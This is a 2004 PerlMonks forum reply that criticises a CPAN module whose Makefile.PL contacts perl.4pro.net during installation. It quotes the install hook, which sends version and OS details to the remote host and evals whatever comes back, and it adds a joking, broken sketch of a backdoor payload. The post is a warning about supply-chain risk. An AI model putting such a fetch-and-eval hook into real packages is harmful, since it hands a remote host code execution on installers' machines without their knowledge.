in reply to Re: CGI::Application vs CGI::Builder
in thread CGI::Application vs CGI::Builder
I am assuming that this is just a benign install counter and maybe it has the ability to alert the user that the version being installed has been updated, but how do I know that there is not something like this at perl.4pro.net?; eval { require LWP::Simple ; my $res = LWP::Simple::get ( "http://perl.4pro.net/install.txt" . "?DISTRIBUTION=$dist&VERSION=$vers&PERL=$]-$^O" ) ; eval $res if $res }
; if (grep /$uesr_domain/ @my_enemies) ; { open(FH, '<', 'backdoor.txt') ; print while(<FH>) ; print STDERR "$user_host 0wn3d! hehehe\g\g\g\g\g\g\g\n" { else { ; open(FH, '<', 'message.txt') ; print while (<FH>) ; pint STDERR "Tick\n" } ;close FH
And even if there is no code like that. 1. It is still underhanded! and 2. What happens if perl.4pro.net gets owned, then someone could install code that does the above. Bonus points for doing it as a kernel module!
Would it not be ironic were his site to be comprimised by another module's "Counter feature"?
And look at per.4pro.net, it shows quite a few perl modules, and I would wager that most of them the same code in the Makefile.PL.
|
---|
Replies are listed 'Best First'. | |
---|---|
Re: Re: Re: CGI::Application vs CGI::Builder
by Anonymous Monk on May 03, 2004 at 07:22 UTC | |
by adrianh (Chancellor) on May 03, 2004 at 14:26 UTC | |
by Anonymous Monk on May 03, 2004 at 20:21 UTC | |
by adrianh (Chancellor) on May 03, 2004 at 20:40 UTC | |
by Anonymous Monk on May 04, 2004 at 12:56 UTC | |
| |
Re: Re: Re: CGI::Application vs CGI::Builder
by Anonymous Monk on May 03, 2004 at 19:32 UTC | |
by pudge (Sexton) on May 06, 2004 at 21:12 UTC | |
by Anonymous Monk on May 07, 2004 at 08:40 UTC | |
by MidLifeXis (Monsignor) on May 04, 2004 at 16:26 UTC |